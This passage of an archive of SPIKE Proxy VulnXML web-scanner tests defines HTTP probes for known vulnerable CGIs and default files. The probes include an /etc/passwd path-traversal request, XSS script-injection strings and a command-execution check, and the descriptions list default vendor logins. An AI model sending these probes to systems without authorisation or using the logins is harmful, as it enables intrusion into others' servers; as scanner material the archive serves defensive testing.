${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-61.xml0100664000076500007650000000720307566204543017475 0ustar davedave (server-status) "This gives a lot of Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /server-status HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-620.xml0100664000076500007650000000706107566204543017560 0ustar davedave (wrap) "comes with IRIX 6.2; allows to view directories" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-bin/wrap HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-621.xml0100664000076500007650000000713607566204543017564 0ustar davedave (admin.cgi) "May be ImageFolio Pro administration CGI. Default login is Admin/ImageFolio." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-bin/admin/admin.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-622.xml0100664000076500007650000000712507566204543017563 0ustar davedave (setup.cgi) "May be ImageFolio Pro setup CGI. Default login is Admin/ImageFolio." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-bin/admin/setup.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-623.xml0100664000076500007650000000745007566204543017565 0ustar davedave (cgicso?query=<script>alert('Vulnerable')</script>) "This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-624.xml0100664000076500007650000000725407566204543017570 0ustar davedave (cgicso?query=AAA) "This CGI allows attackers to execute remote commands." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-local/cgiemail-1.4/cgicso?query=AAA HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 400 Required field missing\: fingerhost 200 400 Required field missing\: fingerhost 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-625.xml0100664000076500007650000000745007566204543017567 0ustar davedave (cgicso?query=<script>alert('Vulnerable')</script>) "This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-626.xml0100664000076500007650000000725407566204543017572 0ustar davedave (cgicso?query=AAA) "This CGI allows attackers to execute remote commands." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-local/cgiemail-1.6/cgicso?query=AAA HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 400 Required field missing\: fingerhost 200 400 Required field missing\: fingerhost 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-627.xml0100664000076500007650000000727407566204543017575 0ustar davedave (view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00) "This CGI allows reading of remote files. CAN-2001-1019." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-628.xml0100664000076500007650000000703307566204543017567 0ustar davedave (addalink.cgi) "Default CGI 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-sys/addalink.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-629.xml0100664000076500007650000000702107566204543017565 0ustar davedave (cgiecho) "Default CGI 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-sys/cgiecho HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-62.xml0100664000076500007650000000722507566204543017502 0ustar davedave (stronghold-info) "Redhat Stronghold from versions 2.3 up to 3.0 disclose sensitive information. This gives information on configuration. CAN-2001-0868." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /stronghold-info HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-630.xml0100664000076500007650000000702307566204543017557 0ustar davedave (cgiemail) "Default CGI 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-sys/cgiemail HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-631.xml0100664000076500007650000000702507566204543017562 0ustar davedave (countedit) "Default CGI 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-sys/countedit HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-632.xml0100664000076500007650000000704707566204543017567 0ustar davedave (domainredirect.cgi) "Default CGI 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-sys/domainredirect.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-633.xml0100664000076500007650000000704507566204543017566 0ustar davedave (entropybanner.cgi) "Default CGI 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-sys/entropybanner.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-634.xml0100664000076500007650000000704507566204543017567 0ustar davedave (entropysearch.cgi) "Default CGI 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-sys/entropysearch.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-635.xml0100664000076500007650000000704707566204543017572 0ustar davedave (FormMail-clone.cgi) "Default CGI 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-sys/FormMail-clone.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-636.xml0100664000076500007650000000703307566204543017566 0ustar davedave (helpdesk.cgi) "Default CGI 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-sys/helpdesk.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-637.xml0100664000076500007650000000702507566204543017570 0ustar davedave (mchat.cgi) "Default CGI 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-sys/mchat.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-638.xml0100664000076500007650000000703307566204543017570 0ustar davedave (randhtml.cgi) "Default CGI 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-sys/randhtml.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-639.xml0100664000076500007650000000704307566204543017572 0ustar davedave (realhelpdesk.cgi) "Default CGI 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-sys/realhelpdesk.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-63.xml0100664000076500007650000000716007566204543017501 0ustar davedave (stronghold-status) "Redhat Stronghold from versions 2.3 up to 3.0 disclose sensitive information. CAN-2001-0868." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /stronghold-status HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-640.xml0100664000076500007650000000703707566204543017565 0ustar davedave (realsignup.cgi) "Default CGI 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-sys/realsignup.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-641.xml0100664000076500007650000000702307566204543017561 0ustar davedave (scgiwrap) "Default CGI 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-sys/scgiwrap HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-642.xml0100664000076500007650000000702707566204543017566 0ustar davedave (signup.cgi) "Default CGI 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-sys/signup.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-643.xml0100664000076500007650000000721507566204543017566 0ustar davedave (cgiproc?) "It may be possible to crash Nortel Contivity VxWorks by requesting '/cgi/cgiproc?$' (not attempted!). Upgrade to version 2.60 or later." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi/cgiproc? HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-644.xml0100664000076500007650000000722207566204543017565 0ustar davedave (wwwboard.cgi) "Versions 2.0 Alpha and below have multiple problems. See BID-649 and BID 1795. Default ID 'WebAdmin' with pass 'WebBoard'." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgis/wwwboard/wwwboard.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-645.xml0100664000076500007650000000722007566204543017564 0ustar davedave (wwwboard.pl) "Versions 2.0 Alpha and below have multiple problems. See BID-649 and BID 1795. Default ID 'WebAdmin' with pass 'WebBoard'." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgis/wwwboard/wwwboard.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-646.xml0100664000076500007650000000721607566204543017572 0ustar davedave (GeneralChassisConfig.html) "The Cabletron switch may allow remote configuration 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /chassis/config/GeneralChassisConfig.html HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Chassis Configuration 200 Chassis Configuration 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-647.xml0100664000076500007650000000757207566204543017600 0ustar davedave (browse.php?fid=2&tid=4&go=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;) "php(Reactor) v1.2.7 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /comments/browse.php?fid=2&tid=4&go=&lt;script&gt;alert('Vulnerable')&lt;/script&gt; HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-648.xml0100664000076500007650000000705607566204543017576 0ustar davedave (/) "Configuration information may be available remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /config/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-649.xml0100664000076500007650000000705107566204543017572 0ustar davedave (checks.txt) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /config/checks.txt HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-64.xml0100664000076500007650000000713407566204543017503 0ustar davedave (test) "Apache Tomcat default file found. All default files should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /test HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ test hierarchy 200 test hierarchy 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-650.xml0100664000076500007650000000715407566204543017566 0ustar davedave (1/n/n/0/3/5/0/a/123.gif) "The Roxen Counter may eat up excessive CPU time with image requests." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /counter/1/n/n/0/3/5/0/a/123.gif HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-651.xml0100664000076500007650000000712207566204543017562 0ustar davedave (member_log.txt) "Teekai's forum full 1.2 member's log can be retrieved remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /data/member_log.txt HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-652.xml0100664000076500007650000000711007566204543017560 0ustar davedave (log.txt) "Teekai's Tracking Online 1.0 log can be retrieved remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /data/userlog/log.txt HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: 